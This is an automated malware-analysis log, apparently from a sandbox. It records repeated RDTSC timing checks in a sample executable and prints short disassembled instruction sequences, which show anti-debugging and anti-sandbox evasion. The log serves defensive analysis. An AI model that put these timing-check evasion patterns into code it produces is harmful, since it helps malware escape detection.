                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE3D6D second address: DE3D96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F6969412EB5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 pop edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jo 00007F6969412EA6h 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEAD5F second address: DEAD63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEAEF4 second address: DEAF00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jl 00007F6969412EA6h 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEB506 second address: DEB523 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F6968D54742h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEFECF second address: DEFEE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007F6969412EA8h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEFEE2 second address: DEFEFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6968D54747h 0x00000009 pop esi 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEFEFE second address: DEFF09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F6969412EA6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF1887 second address: DF188D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF188D second address: DF1892 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFB022 second address: DFB026 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E028B4 second address: E028BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E028BB second address: E028C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F6968D54736h 0x0000000a popad 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E04196 second address: E0419C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0419C second address: E041AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007F6968D54736h 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E041AA second address: E041B0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D001A2 second address: D001A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D001A6 second address: D001CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F6969412EB5h 0x0000000d jmp 00007F6969412EAAh 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D001CD second address: D001D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E065BF second address: E065C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E065C3 second address: E065E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6968D54747h 0x00000007 jns 00007F6968D54736h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFFFA0 second address: DFFFA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E153CF second address: E153DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F6968D54736h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E153DB second address: E153F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007F6969412EA8h 0x0000000b popad 0x0000000c js 00007F6969412EB2h 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 pop edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E14F2D second address: E14F4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6968D54746h 0x00000009 popad 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E14F4F second address: E14F53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E14F53 second address: E14F5D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2F03A second address: E2F056 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6969412EB2h 0x00000009 js 00007F6969412EA6h 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2E10C second address: E2E122 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6968D5473Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2E27A second address: E2E286 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jnp 00007F6969412EA6h 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2E286 second address: E2E2A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jno 00007F6968D54736h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007F6968D5473Ch 0x00000012 push edi 0x00000013 pop edi 0x00000014 pop eax 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2E2A8 second address: E2E2B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push ebx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2E7CD second address: E2E7D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push esi 0x00000009 pop esi 0x0000000a popad 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2ED2A second address: E2ED36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3063E second address: E30642 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E32EC2 second address: E32ECE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edi 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E32ECE second address: E32ED2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E33223 second address: E3325E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6969412EB7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b pushad 0x0000000c push eax 0x0000000d jg 00007F6969412EA6h 0x00000013 pop eax 0x00000014 push eax 0x00000015 push eax 0x00000016 pop eax 0x00000017 pop eax 0x00000018 popad 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F6969412EAAh 0x00000024 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3325E second address: E33268 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F6968D54736h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E334DF second address: E334E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E334E3 second address: E334E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E334E9 second address: E334ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E334ED second address: E334F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E36567 second address: E36570 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E36570 second address: E36576 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E36576 second address: E3657A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3657A second address: E365C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6968D54748h 0x00000007 jmp 00007F6968D54747h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007F6968D5473Dh 0x00000013 popad 0x00000014 pushad 0x00000015 pushad 0x00000016 push eax 0x00000017 pop eax 0x00000018 pushad 0x00000019 popad 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C30C4D second address: 4C30C7A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F6969412EB1h 0x00000008 pop eax 0x00000009 movsx edi, si 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F6969412EAFh 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70E05 second address: 4C70E2A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, dx 0x00000006 mov ch, dh 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F6968D54742h 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70E2A second address: 4C70E30 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70E30 second address: 4C70E7A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6968D5473Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F6968D54746h 0x0000000f mov ebp, esp 0x00000011 pushad 0x00000012 push eax 0x00000013 movsx edi, si 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 call 00007F6968D54745h 0x0000001e pop esi 0x0000001f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C30A1E second address: 4C30A22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C30A22 second address: 4C30A28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C30A28 second address: 4C30A40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6969412EB4h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C30A40 second address: 4C30AB3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6968D5473Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F6968D54744h 0x00000014 xor cx, 1798h 0x00000019 jmp 00007F6968D5473Bh 0x0000001e popfd 0x0000001f mov ecx, 4E00D94Fh 0x00000024 popad 0x00000025 pop ebp 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007F6968D54747h 0x0000002f jmp 00007F6968D54743h 0x00000034 popfd 0x00000035 mov ah, 3Eh 0x00000037 popad 0x00000038 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C30616 second address: 4C3061C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C3061C second address: 4C30658 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6968D54744h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F6968D5473Bh 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F6968D54745h 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C30658 second address: 4C30675 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6969412EB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C30675 second address: 4C30679 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C30679 second address: 4C3067F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C30585 second address: 4C305AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, ebx 0x00000005 push ebx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push edi 0x0000000d jmp 00007F6968D54740h 0x00000012 pop esi 0x00000013 popad 0x00000014 xchg eax, ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C305AB second address: 4C305B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C302A6 second address: 4C302AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C302AA second address: 4C302B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C302B0 second address: 4C302B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, A0h 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C302B7 second address: 4C302D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007F6969412EAAh 0x0000000d xchg eax, ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov esi, edx 0x00000013 push edi 0x00000014 pop ecx 0x00000015 popad 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C302D2 second address: 4C3031E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6968D54740h 0x00000009 sub eax, 75762B38h 0x0000000f jmp 00007F6968D5473Bh 0x00000014 popfd 0x00000015 mov cx, 1D6Fh 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov ebp, esp 0x0000001e pushad 0x0000001f mov ebx, esi 0x00000021 movzx esi, dx 0x00000024 popad 0x00000025 pop ebp 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F6968D54741h 0x0000002f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C3031E second address: 4C30324 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C4001A second address: 4C4005C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6968D54741h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007F6968D54747h 0x00000010 mov ch, 73h 0x00000012 popad 0x00000013 xchg eax, ebp 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F6968D5473Eh 0x0000001b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C4005C second address: 4C40061 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C40061 second address: 4C40085 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ebx, 3CEB8732h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F6968D54744h 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70D3A second address: 4C70D40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70D40 second address: 4C70D44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70D44 second address: 4C70D6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 jmp 00007F6969412EACh 0x0000000e mov dword ptr [esp], ebp 0x00000011 pushad 0x00000012 pushad 0x00000013 call 00007F6969412EACh 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C502F4 second address: 4C50322 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop ebx 0x00000006 popad 0x00000007 pushad 0x00000008 mov ecx, 56A5488Bh 0x0000000d mov si, E267h 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F6968D54748h 0x0000001b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C50322 second address: 4C503A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 1074h 0x00000007 mov si, di 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e pushad 0x0000000f call 00007F6969412EB5h 0x00000014 pushfd 0x00000015 jmp 00007F6969412EB0h 0x0000001a sub ecx, 394E0558h 0x00000020 jmp 00007F6969412EABh 0x00000025 popfd 0x00000026 pop eax 0x00000027 push edi 0x00000028 mov ecx, 04A3782Bh 0x0000002d pop esi 0x0000002e popad 0x0000002f mov ebp, esp 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 mov dx, ax 0x00000037 pushfd 0x00000038 jmp 00007F6969412EB4h 0x0000003d sub ecx, 0AE9D6E8h 0x00000043 jmp 00007F6969412EABh 0x00000048 popfd 0x00000049 popad 0x0000004a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C503A2 second address: 4C503A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C503A8 second address: 4C503F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6969412EABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebp+08h] 0x0000000e pushad 0x0000000f mov esi, 7C22C7EBh 0x00000014 pushfd 0x00000015 jmp 00007F6969412EB0h 0x0000001a sub eax, 195F3478h 0x00000020 jmp 00007F6969412EABh 0x00000025 popfd 0x00000026 popad 0x00000027 and dword ptr [eax], 00000000h 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d mov ax, di 0x00000030 mov bl, 2Ah 0x00000032 popad 0x00000033 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C503F2 second address: 4C5040A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6968D54744h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C304B0 second address: 4C304D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6969412EB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b call 00007F6969412EACh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C304D5 second address: 4C304E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 mov cx, dx 0x00000008 popad 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C304E4 second address: 4C304EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bl, 02h 0x00000006 popad 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C40D88 second address: 4C40DAE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6968D54741h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F6968D5473Dh 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C5017C second address: 4C501E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 3AF89452h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebp, esp 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F6969412EB5h 0x00000016 sbb esi, 5ADFFB26h 0x0000001c jmp 00007F6969412EB1h 0x00000021 popfd 0x00000022 pushfd 0x00000023 jmp 00007F6969412EB0h 0x00000028 or si, 6CC8h 0x0000002d jmp 00007F6969412EABh 0x00000032 popfd 0x00000033 popad 0x00000034 pop ebp 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C501E4 second address: 4C501E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C501E8 second address: 4C501EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C706E9 second address: 4C706ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C706ED second address: 4C706F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
